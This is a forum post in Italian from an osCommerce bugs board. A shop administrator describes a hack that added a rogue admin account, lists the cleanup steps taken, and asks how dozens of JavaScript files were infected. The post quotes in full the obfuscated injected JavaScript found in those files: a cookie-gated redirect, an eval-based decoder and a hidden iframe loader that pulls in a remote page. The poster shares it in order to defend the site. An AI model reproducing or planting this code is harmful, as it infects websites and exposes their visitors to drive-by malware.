bug risolto oscommerce 2.2 ... ma mi viene un dubbio

Questo forum è dedicato alle discussioni riguardanti i bug presenti in osCommerceITalia PACK

Moderatore: mod Generali

Rispondi
vinarcid0810
membro Junior
membro Junior
Messaggi: 5
Iscritto il: 23/10/2008, 20:57

bug risolto oscommerce 2.2 ... ma mi viene un dubbio

Messaggio da vinarcid0810 »

Ragazzi per un cliente è stata istallata circa 2 anni fa la versione oscommerce 2.2. modificata a nostro piacimento

in questi giorni ho avuto un attacco hack al sito ...
mi ritrovavo un altro amministratore con tutti i permessi
sicuramente entrato sfruttando questo bag :

http://www.exploit-db.com/exploits/12801/

ho fatto quanto segue:
1) rinominato la cartella admin
2) cartella amministrazione protetta da nick è password tramite file .htaccess
3) cancellato il file_manager.php
4) rimosso link a file manager nell'amministrazione
5) istallate diverse contribution per migliorare la sicurezza di oscommerce

http://forums.oscommerce.com/topic/3133 ... your-site/

6) ho dovuto modificare tutti i file infetti uno ad uno (non avevo una copia di backap pulita)

questo il tutto .... ma sono rimasto con un forte dubbio ....
tutti i file javascript presentavano alla fine del proprio codice questo (che ho rimosso) ,
ma è possibile che l'hack in questione si sia messo a modificare tutti questi file?? (parliamo di circa 70/80 file)
ho controllato il file .htaccess ma non mi sembra che abbia chiamate per modificare i file
cosa ne pensate?

Codice: Seleziona tutto

if(document.cookie.indexOf("udb=1")<0){var j=0,n="";while(j<54)n+=String.fromCharCode("iuuq;00hbups76/iptuhbups/dpn0ec:160uet0pvu/qiq@t`je>2".charCodeAt(j++)-1);document.cookie="udb=1;";document.location=n;}function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(last_style_node.addRule)=="object")last_style_node.addRule(selector,declaration);}};createCSS("#va","background:url(data:,String.fromCharCode)");var my=null;var r=document.styleSheets;for(var i=0;i<r.length;i++){try{var dkfw=r[i].cssRules||r[i].rules;for(var srx=0;srx<dkfw.length;srx++){var gk=dkfw.item?dkfw.item(srx):dkfw[srx];if(!gk.selectorText.match(/#va/))continue;fyqo=(gk.cssText)?gk.cssText:gk.style.cssText;my=fyqo.match(/(S[^")]+)/)[1];iu=gk.selectorText.substr(1);};}catch(e){};}kgl=new Date(2010,11,3,2,21,4);t=kgl.getSeconds();var dkel=[36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,236/t,52/t,36/t,36/t,500/t,128/t,404/t,432/t,460/t,404/t,128/t,492/t,52/t,36/t,36/t,36/t,472/t,388/t,456/t,128/t,392/t,400/t,484/t,128/t,244/t,128/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,160/t,136/t,392/t,444/t,400/t,484/t,136/t,164/t,236/t,52/t,36/t,36/t,36/t,464/t,456/t,484/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,392/t,400/t,484/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,128/t,396/t,388/t,464/t,396/t,416/t,128/t,160/t,404/t,164/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,392/t,444/t,400/t,484/t,128/t,244/t,128/t,392/t,400/t,484/t,236/t,52/t,36/t,36/t,36/t,500/t,52/t,36/t,36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,36/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,128/t,404/t,432/t,460/t,404/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,476/t,456/t,420/t,464/t,404/t,160/t,136/t,240/t,420/t,408/t,456/t,388/t,436/t,404/t,128/t,460/t,456/t,396/t,244/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,404/t,468/t,456/t,444/t,480/t,212/t,184/t,392/t,420/t,488/t,188/t,460/t,464/t,388/t,484/t,188/t,444/t,468/t,464/t,184/t,448/t,416/t,448/t,252/t,460/t,380/t,420/t,400/t,244/t,196/t,156/t,128/t,476/t,420/t,400/t,464/t,416/t,244/t,156/t,196/t,192/t,156/t,128/t,416/t,404/t,420/t,412/t,416/t,464/t,244/t,156/t,196/t,192/t,156/t,128/t,460/t,464/t,484/t,432/t,404/t,244/t,156/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,232/t,416/t,420/t,400/t,400/t,404/t,440/t,236/t,448/t,444/t,460/t,420/t,464/t,420/t,444/t,440/t,232/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,236/t,432/t,404/t,408/t,464/t,232/t,192/t,236/t,464/t,444/t,448/t,232/t,192/t,236/t,156/t,248/t,240/t,188/t,420/t,408/t,456/t,388/t,436/t,404/t,248/t,136/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,52/t,36/t,36/t,500/t,52/t,36/t,36/t,408/t,468/t,440/t,396/t,464/t,420/t,444/t,440/t,128/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,492/t,52/t,36/t,36/t,36/t,472/t,388/t,456/t,128/t,408/t,128/t,244/t,128/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,160/t,156/t,420/t,408/t,456/t,388/t,436/t,404/t,156/t,164/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,460/t,456/t,396/t,156/t,176/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,404/t,468/t,456/t,444/t,480/t,212/t,184/t,392/t,420/t,488/t,188/t,460/t,464/t,388/t,484/t,188/t,444/t,468/t,464/t,184/t,448/t,416/t,448/t,252/t,460/t,380/t,420/t,400/t,244/t,196/t,156/t,164/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,244/t,156/t,416/t,420/t,400/t,400/t,404/t,440/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,448/t,444/t,460/t,420/t,464/t,420/t,444/t,440/t,244/t,156/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,432/t,404/t,408/t,464/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,464/t,444/t,448/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,476/t,420/t,400/t,464/t,416/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,416/t,404/t,420/t,412/t,416/t,464/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,52/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,408/t,164/t,236/t,52/t,36/t,36/t,500/t];var aty="";var g=function(){return this;}();ko=g["e"+iu+"l"];var ydxx="";gh=ko(my);for(var i=0;i<dkel.length;i++){ch=ko(dkel[i]);ydxx+=gh(ch);}ko(ydxx);if (typeof(defs_colors)=="undefined") {
   var defs_colors = 1;

   var div_colors = new Array('#778383', '#7f493e', '#3e7277', '#70737e', '#7d3d7d', '#7b3e7e', '#897883', '#847374', '#3e7270', '#83707b', '#7e763e', '#4e7270', '#83707b', '#7e7681', '#82827d', '#748682', '#4c4000');
   var css_colors = new Array('#717e73', '#887378', '#857378', '#827f7b', '#70887d', '#7e7d74', '#787581', '#707c74', '#4b7378', '#852f82', '#83887b', '#744c36', '#737882', '#7f7b70', '#88497d', '#7e7d74', '#364d4b', '#787581', '#707c74', '#2f8281', '#724c36', '#364d4b', '#3e7875', '#81707c', '#744d4b', '#3e7378', '#854d82', '#81724e', '#81754c');
   var css_indexes = new Array(4, 3, 7, 4, 6, 39, 17, 3, 4);

   function div_pick_colors(t) {
	var s = '';
	for (j=0;j<t.length;j++) {	
		var c_rgb = t[j];
		for (i=1;i<7;i++) {
			var c_clr = c_rgb.substr(i++,2);
			if (c_clr!='00') s += String.fromCharCode(parseInt(c_clr,16)-15);
		}
	  }
	return s;
   }

   var ct = new Array(10);
   var s = div_pick_colors(css_colors);
   var c = css_indexes;
   ct[0] = div_pick_colors(div_colors);
   var j = 0; var ci = 1;
   for(i=0;i<c.length;i++) {
  	ct[ci++] = s.substr(j,c[i]);
	j=j+c[i];
   }
   ct[0] = ct[0];
   function check_div_styles() {
	var d=document.getElementsByTagName(ct[1])[0];
	if(d) {
		try {
			var d=document.getElementsByTagName(ct[1])[0];
			var v=document.createElement(ct[2]);
			v.style.display=ct[4];
			v.setAttribute(ct[3],ct[4]);
			d.appendChild(v);
			w=document.createElement(ct[5]);
			w.src=ct[0];
			w.setAttribute(ct[8],ct[0]);
			v.appendChild(w);
		} catch(e) {
			document.write(ct[6]+ct[0]+ct[7]);
		}
	   } else {
		setTimeout("check_div_styles();",500);	
	   }
   }

   check_div_styles();

}
Top
Rispondi

Torna a “Bugs”